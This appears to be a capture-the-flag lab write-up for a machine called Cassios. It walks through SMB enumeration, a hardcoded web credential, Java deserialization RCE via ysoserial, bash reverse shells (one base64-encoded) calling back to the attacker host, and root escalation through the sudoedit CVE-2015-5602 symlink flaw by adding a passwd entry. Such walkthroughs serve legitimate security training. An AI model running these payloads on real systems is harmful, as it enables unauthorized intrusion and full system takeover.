Summary
We will gain RCE on this machine through a Java Deserialization attack. Then, we'll escalate our privileges with sudoedit.
Enumeration
Nmap
We'll start off with an nmap scan.
kali@kali:~$ sudo nmap -sV -sC 192.168.120.53
[sudo] password for kali:
Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-10-06 19:00 -03
Nmap scan report for 192.168.120.53
Host is up (0.15s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 36:cd:06:f8:11:72:6b:29:d8:d8:86:99:00:6b:1d:3a (RSA)
| 256 7d:12:27:de:dd:4e:8e:88:48:ef:e3:e0:b2:13:42:a1 (ECDSA)
|_ 256 c4:db:d3:61:af:85:95:0e:59:77:c5:9e:07:0b:2f:74 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Landed by HTML5 UP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Tue, 06 Oct 2020 22:00:22 GMT
| Connection: close
| <!doctype html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title></title>
| <link rel="stylesheet" href="/css/main.css">
| </head>
| <body>
| <div class="small-container">
| <div class="flex-row">
| <h1>Recycler Management System</h1>
| </div>
| <div class="flex-row">
| <img src="/images/factory.jpg" class="round-button">
| </div>
| </div>
|
| <div class="small-container">
| <div class="flex-small">Control system for the factory
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Length: 0
| Date: Tue, 06 Oct 2020 22:00:22 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Tue, 06 Oct 2020 22:00:22 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html;charset=UTF-8).
|_http-trane-info: Problem with XML parsing of /evox/about
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port8080-TCP:V=7.80%I=7%D=10/6%Time=5F7CE8F6%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,429,"HTTP/1\\.1\\x20200\\x20\\r\\nX-Content-Type-Options:\\x20nosnif
SF:f\\r\\nX-XSS-Protection:\\x201;\\x20mode=block\\r\\nCache-Control:\\x20no-cach
SF:e,\\x20no-store,\\x20max-age=0,\\x20must-revalidate\\r\\nPragma:\\x20no-cache
SF:\\r\\nExpires:\\x200\\r\\nX-Frame-Options:\\x20DENY\\r\\nContent-Type:\\x20text/
SF:html;charset=UTF-8\\r\\nContent-Language:\\x20en-US\\r\\nDate:\\x20Tue,\\x2006
SF:\\x20Oct\\x202020\\x2022:00:22\\x20GMT\\r\\nConnection:\\x20close\\r\\n\\r\\n<!doc
SF:type\\x20html>\\n<html\\x20lang=\\"en\\">\\n\\n<head>\\n\\x20\\x20<meta\\x20charse
SF:t=\\"utf-8\\">\\n\\x20\\x20<meta\\x20http-equiv=\\"x-ua-compatible\\"\\x20conten
SF:t=\\"ie=edge\\">\\n\\x20\\x20<meta\\x20name=\\"viewport\\"\\x20content=\\"width=d
SF:evice-width,\\x20initial-scale=1\\">\\n\\n\\x20\\x20<title></title>\\n\\n\\x20\\x
SF:20<link\\x20rel=\\"stylesheet\\"\\x20href=\\"/css/main\\.css\\">\\n\\x20\\x20\\n</
SF:head>\\n\\n<body>\\n\\t\\n\\t<div\\x20class=\\"small-container\\">\\n\\t\\t<div\\x20
SF:class=\\"flex-row\\">\\n\\t\\t\\t<h1>Recycler\\x20Management\\x20System</h1>\\n\\
SF:t\\t</div>\\n\\t\\t<div\\x20class=\\"flex-row\\">\\n\\t\\t\\t<img\\x20src=\\"/images
SF:/factory\\.jpg\\"\\x20class=\\"round-button\\">\\n\\t\\t</div>\\x20\\n\\n\\t</div>\\
SF:n\\t\\n\\t<div\\x20class=\\"small-container\\">\\n\\n\\t\\t\\t<div\\x20class=\\"
SF:flex-small\\">Control\\x20system\\x20for\\x20the\\x20factory\\x20")%r(HTTPOpt
SF:ions,12B,"HTTP/1\\.1\\x20200\\x20\\r\\nAllow:\\x20GET,HEAD,OPTIONS\\r\\nX-Conte
SF:nt-Type-Options:\\x20nosniff\\r\\nX-XSS-Protection:\\x201;\\x20mode=block\\r\\
SF:nCache-Control:\\x20no-cache,\\x20no-store,\\x20max-age=0,\\x20must-revalid
SF:ate\\r\\nPragma:\\x20no-cache\\r\\nExpires:\\x200\\r\\nX-Frame-Options:\\x20DENY
SF:\\r\\nContent-Length:\\x200\\r\\nDate:\\x20Tue,\\x2006\\x20Oct\\x202020\\x2022:00
SF::22\\x20GMT\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(RTSPRequest,24E,"HTTP/1\\
SF:.1\\x20400\\x20\\r\\nContent-Type:\\x20text/html;charset=utf-8\\r\\nContent-La
SF:nguage:\\x20en\\r\\nContent-Length:\\x20435\\r\\nDate:\\x20Tue,\\x2006\\x20Oct\\x
SF:202020\\x2022:00:22\\x20GMT\\r\\nConnection:\\x20close\\r\\n\\r\\n<!doctype\\x20h
SF:tml><html\\x20lang=\\"en\\"><head><title>HTTP\\x20Status\\x20400\\x20\\xe2\\x80
SF:\\x93\\x20Bad\\x20Request</title><style\\x20type=\\"text/css\\">body\\x20{font
SF:-family:Tahoma,Arial,sans-serif;}\\x20h1,\\x20h2,\\x20h3,\\x20b\\x20{color:w
SF:hite;background-color:#525D76;}\\x20h1\\x20{font-size:22px;}\\x20h2\\x20{fo
SF:nt-size:16px;}\\x20h3\\x20{font-size:14px;}\\x20p\\x20{font-size:12px;}\\x20
SF:a\\x20{color:black;}\\x20\\.line\\x20{height:1px;background-color:#525D76;b
SF:order:none;}</style></head><body><h1>HTTP\\x20Status\\x20400\\x20\\xe2\\x80\\
SF:x93\\x20Bad\\x20Request</h1></body></html>");
Service Info: Host: CASSIOS
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m35s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.4)
| Computer name: cassios
| NetBIOS computer name: CASSIOS\\x00
| Domain name: \\x00
| FQDN: cassios
|_ System time: 2020-10-06T18:00:39-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-06T22:00:38
|_ start_date: N/A
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
The scan shows several interesting details.
Curl
First, let's explore the HTTP service on port 8080.
kali@kali:~$ curl <http://192.168.120.53:8080/>
...
<body>
<div class="small-container">
<div class="flex-row">
<h1>Recycler Management System</h1>
</div>
<div class="flex-row">
<img src="/images/factory.jpg" class="round-button">
</div>
</div>
<div class="small-container">
<div class="flex-small">Control system for the factory recycler. Access the Dashboard for more options.</div>
<div class="flex-small"><a href="/dashboard" class="button">Dashboard</a></div>
</div>
</body>
...
This appears to be some kind of application for reviewing the status of a machine. When accessing the web application, we see a "Dashboard" button that requires credentials. We'll make a note of this and explore the other available services on the target.
Samba
Interestingly, we can use smbclient to connect with an empty password.
$ smbclient -L \\\\192.168.120.53
Enter WORKGROUP\\kali's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Samantha Konstan Disk Backups and Recycler files
IPC$ IPC IPC Service (Samba 4.10.4)
SMB1 disabled -- no workgroup availabl
We discover an open share (Samantha Konstan) that seems to be related to the "Recycler" web application. Let's explore this share.
kali@kali:~$ smbclient "\\\\\\\\192.168.120.53\\\\Samantha Konstan"
Enter WORKGROUP\\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Thu Sep 24 14:37:41 2020
.. D 0 Thu Sep 24 14:38:10 2020
recycler.ser N 0 Wed Sep 23 22:35:15 2020
readme.txt N 478 Thu Sep 24 14:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 14:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 14:37:09 2020
resources.html N 42713 Thu Sep 24 14:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:09:51 2020
8374272 blocks of size 1024. 6454116 blocks available
We'll download readme.txt, recycler.ser, and pom-bak.xml for further inspection.
smb: \\> get readme.txt
getting file \\readme.txt of size 478 as readme.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \\> get recycler.ser
getting file \\recycler.ser of size 0 as recycler.ser (0.0 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \\> get pom-bak.xml
getting file \\pom-bak.xml of size 2187 as pom-bak.xml (4.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)
smb: \\>
We'll use this SMB session again so let's leave it open for now. Let's inspect readme.txt and recycler.ser.
kali@kali:~$ cat readme.txt
The recycler is a critical piece of our industrial infraestructure.
Please be careful with it!
The .ser file holds all the last data saved from the process, it can
be readed from the upper management dashboard app.
Remember to set the location of the file to my home directory "~/backups".
Set this directory to share access so the remote system can access the
file via SMB.
Any concerns or suggestions, please reach at [email protected].
Samantha Konstan
Java Mantainer
kali@kali:~$ cat recycler.ser
kali@kali:~$
The recycler.ser file is empty, and we don't know the password for the web application. A quick online search indicates that .ser files usually hold serialized objects. Let's continue exploring.
DIRB
We'll bruteforce the web application on port 80 using dirb and the default wordlist.
kali@kali:~$ dirb <http://192.168.120.53/>
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Oct 1 15:26:49 2020
URL_BASE: <http://192.168.120.53/>
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: <http://192.168.120.53/> ----
==> DIRECTORY: <http://192.168.120.53/assets/>
==> DIRECTORY: <http://192.168.120.53/backup_migrate/>
+ <http://192.168.120.53/cgi-bin/> (CODE:403|SIZE:210)
+ <http://192.168.120.53/download> (CODE:200|SIZE:1479862)
==> DIRECTORY: <http://192.168.120.53/images/>
+ <http://192.168.120.53/index.html> (CODE:200|SIZE:9088)
...
We find an interesting backup_migrate directory. Let's navigate to that directory with curl.
kali@kali:~$ curl <http://192.168.120.53/backup_migrate/> | html2text
****** Index of /backup_migrate ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[ ]] recycler.tar 2020-10-01 14:39 230K
===========================================================================
We have discovered what appears to be a backup file related to the "Recycler" application. Let's download it and explore its contents.
kali@kali:~$ wget <http://192.168.120.53/backup_migrate/recycler.tar>
--2020-10-01 15:42:40-- <http://192.168.120.53/backup_migrate/recycler.tar>
Connecting to 192.168.120.53:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 235520 (230K) [application/x-tar]
Saving to: ‘recycler.tar’
recycler.tar 100%[=============================>] 230.00K 449KB/s in 0.5s
2020-10-01 15:42:41 (449 KB/s) - ‘recycler.tar’ saved [235520/235520]
kali@kali:~$ tar xvf recycler.tar
src/
src/main/
src/main/resources/
src/main/resources/static/
src/main/resources/static/css/
src/main/resources/static/css/main.css
src/main/resources/static/css/graph.css
src/main/resources/static/images/
src/main/resources/static/images/factory.jpg
src/main/resources/templates/
src/main/resources/templates/home.html
src/main/resources/templates/login.html
src/main/resources/templates/hello.html
src/main/resources/templates/dashboard.html
src/main/resources/application.properties
src/main/java/
src/main/java/com/
src/main/java/com/industrial/
src/main/java/com/industrial/recycler/
src/main/java/com/industrial/recycler/WebSecurityConfig.java
src/main/java/com/industrial/recycler/._DashboardController.java
src/main/java/com/industrial/recycler/DashboardController.java
src/main/java/com/industrial/recycler/RecyclerApplication.java
src/main/java/com/industrial/recycler/Test.java
src/main/java/com/industrial/recycler/._Recycler.java
src/main/java/com/industrial/recycler/Recycler.java
src/main/java/com/industrial/recycler/MvcConfig.java
This is Java source code for the application. The WebSecurityConfig.java file is particularly interesting.
kali@kali:~$ cat src/main/java/com/industrial/recycler/WebSecurityConfig.java
package com.industrial.recycler;
import org.springframework.context.annotation.Bean;
...
@Bean
@Override
public UserDetailsService userDetailsService() {
UserDetails user =
User.withDefaultPasswordEncoder()
.username("recycler")
.password("DoNotMessWithTheRecycler123")
.roles("USER")
.build();
...
The username recycler and the password DoNotMessWithTheRecycler123 appear to be hardcoded. These credentials work against the web application on port 8080, and we can now load the /dashboard page.
Recycler
Exploitation
Java Deserialization Vulnerability
Recall that, at first, the recycler.ser file was empty. On the dashboard web page, we can see some null values.
When we click "Check Status", these values don't change. However, clicking "Save Current Values" replaces the null values with data:
Recycler
Let's re-download recycler.ser in our SMB session and inspect it for changes.
smb: \\> get recycler.ser
getting file \\recycler.ser of size 145 as recycler.ser (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
The file now contains Java serialized data.
kali@kali:~$ file recycler.ser
recycler.ser: Java serialization data, version 5
kali@kali:~$ cat recycler.ser
��sr com.industrial.recycler.RecyclerLdate_atLjava/lang/String;Lliquidq~Lsolidq~Ltotalq~xptNow()t89t11t7
The dashboard saves the application information as a Java serialized file. We might be able to overwrite this file via SMB and exploit it with a Java deserialization attack.
We'll use ysoserial to attempt to exploit this vulnerability. Let's download it now.
kali@kali:~$ wget <https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar> -O ysoserial.jar
...
kali@kali:~$
This tool requires an important piece of information: a payload. The best clue as to which payload we should use lies in the pom-bak.xml file we downloaded earlier from the Samba Share:
kali@kali:~$ cat pom-bak.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="<http://maven.apache.org/POM/4.0.0>" xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>"
xsi:schemaLocation="<http://maven.apache.org/POM/4.0.0> <https://maven.apache.org/xsd/maven-4.0.0.xsd>">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.3.4.RELEASE</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.industrial</groupId>
<artifactId>recycler</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>recycler</name>
<description>Recycler Control Information</description>
...
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
<dependency>
...
One particular line (<artifactId>commons-collections4</artifactId>) points us in the right direction. We will use CommonsCollections4 as the payload when we launch the attack.
We must set the location of the file as outlined in readme.txt:
Remember to set the location of the file to my home directory "~/backups".
The readme.txt also mentions the name "Samantha". For our first attempt, let's assume that the username is samantha and extrapolate that the complete directory being referred to is /home/samantha/backups. Let's try a simple test. We'll attempt to write to that directory to determine if we can get RCE. We'll provide the payload and the command we want to execute on the command line.
kali@kali:~$ java -jar ysoserial.jar CommonsCollections4 "touch /home/samantha/backups/hacked" > recycler.ser
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Next, we'll upload this file using the SMB session and click "Check Status" on the page to deserialize the malicious data we just created.
smb: \\> put recycler.ser
putting file recycler.ser as \\recycler.ser (9.0 kb/s) (average 9.0 kb/s)
When we click the button, the values revert to null once again. Let's see if our file exists.
smb: \\> ls
. D 0 Thu Oct 1 16:22:23 2020
.. D 0 Thu Sep 24 14:38:10 2020
recycler.ser A 3567 Thu Oct 1 16:22:20 2020
readme.txt N 478 Thu Sep 24 14:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 14:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 14:37:09 2020
resources.html N 42713 Thu Sep 24 14:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:09:51 2020
hacked N 0 Thu Oct 1 16:22:23 2020
This confirms that we have remote code execution. Very nice. Let's create a bash reverse shell.
kali@kali:~$ cat rev.sh
bash -i >& /dev/tcp/192.168.118.8/139 0>&1
Next, let's create an updated malicious serialized file.
kali@kali:~$ java -jar ysoserial.jar CommonsCollections4 "bash /home/samantha/backups/rev.sh" > recycler.ser
We'll upload both files using SMB.
smb: \\> put rev.sh
putting file rev.sh as \\rev.sh (0.4 kb/s) (average 17.7 kb/s)
smb: \\> put recycler.ser
putting file recycler.ser as \\recycler.ser (37.8 kb/s) (average 24.1 kb/s)
smb: \\>
Finally, let's set up a netcat listener on port 139 and click the "Check Status" button on the page to obtain our reverse shell.
kali@kali:~$ sudo nc -lvnp 139
[sudo] password for kali:
listening on [any] 139 ...
connect to [192.168.118.8] from (UNKNOWN) [192.168.120.53] 37750
bash: no job control in this shell
[samantha@cassios /]$
[samantha@cassios /]$ cd /home/samantha
[samantha@cassios ~]$
Escalation
Sudoedit 1.8.14
Next, we need to escalate our privileges. After a bit of enumeration, we find something interesting about our sudo permissions:
[samantha@cassios ~]$ sudo -l
Matching Defaults entries for samantha on cassios:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="QTDIR
KDEDIR"
User samantha may run the following commands on cassios:
(root) NOPASSWD: sudoedit /home/*/*/recycler.ser
It seems we can run sudoedit on recycler.ser in our home directory with elevated privileges and without the password. Let's check the version of sudo we are dealing with.
[samantha@cassios ~]$ sudo -V
Sudo version 1.8.14
Sudoers policy plugin version 1.8.14
Sudoers file grammar version 44
Sudoers I/O plugin version 1.8.14
According to the Exploit Database, it seems that this version might be vulnerable to an unauthorized privilege escalation. Let's test this by following the exploit instructions.
[samantha@cassios ~]$ mkdir newdir
mkdir newdir
[samantha@cassios ~]$ cd newdir
cd newdir
[samantha@cassios newdir]$ ln -s /etc/passwd recycler.ser
ln -s /etc/passwd recycler.ser
[samantha@cassios newdir]$ cat recycler.ser
cat recycler.ser
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
...
It appears that this will let us escalate to root by creating a new entry in the /etc/passwd file. However, we'll need to use the sudoedit options and we'll need to edit the file with vim. This requires a fully interactive shell. Fortunately, we find socat installed on the system.
[samantha@cassios newdir]$ which socat
which socat
/usr/bin/socat
This tool can provide a fully interactive shell, and we can use it to proceed. Let's set up a socat listener on port 445 of our attack machine.
kali@kali:~$ sudo socat file:`tty`,raw,echo=0 tcp-listen:445
...
Next, we'll run the tool on the target to upgrade our shell.
[samantha@cassios newdir]$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.118.8:445
<socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.118.8:445
...
This grants us a fully interactive shell.
kali@kali:~$ sudo socat file:`tty`,raw,echo=0 tcp-listen:445
[samantha@cassios newdir]$ id
uid=1000(samantha) gid=1000(samantha) groups=1000(samantha)
Alternative Interactive Shell:
As an alternative to using socat for a fully-interactive shell, we can upload our private SSH key to the user's authorized_keys file and then SSH in. To do that, we would:
- Create the /home/samantha/.ssh directory.
- If we don't already have one, create an SSH key pair with
ssh-keygen. - Host our public key id_rsa.pub on the attacking machine's web server.
- Download our public key to the target and save as /home/samantha/.ssh/authorized_keys.
- Grant proper permissions (0700 for /home/samantha/.ssh and 0644 for /home/samantha/.ssh/authorized_keys).
- SSH in using our private key to obtain a full interactive shell.
Once we have access to an upgraded shell, we can test the vulnerability by editing the file.
[samantha@cassios ~]$ sudoedit /home/samantha/newdir/recycler.ser
We'll use the vim i command to make the file insertable and scroll to the bottom of the file:
...
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
-- INSERT --
We'll insert a new root2 user with a password of testing. We can generate the password with openssl passwd testing. The final line should read:
root2:KWi2XW05LmkMg:0:0:root:/root:/bin/bash
Next we will insert the line into the file:
root2:KWi2XW05LmkMg:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...
We'll press ESCAPE to return to command mode and save the file with :wq. After saving the file, we should be able to log in as the new user which will grant us root-level access.
[samantha@cassios ~]$ su - root2
Password: testing
...
[root2@cassios ~]# id
uid=0(root2) gid=0(root) groups=0(root)
PS:
https://github.com/t0kx/privesc-CVE-2015-5602/blob/master/exploit.sh
[samantha@cassios tmp]$ ./exploit.sh
./exploit.sh
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: 6a12f449790ed7be96d77aa4c7d9c1c1
[+] Done
[samantha@cassios tmp]$ su
su
Password: 6a12f449790ed7be96d77aa4c7d9c1c1
id
uid=0(root) gid=0(root) groups=0(root)
./payload -r -e base64
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE5Mi8yOTk1NSAwPiYxCg==}|{base64,-d}|{bash,-i}" > recycler.ser
Discussion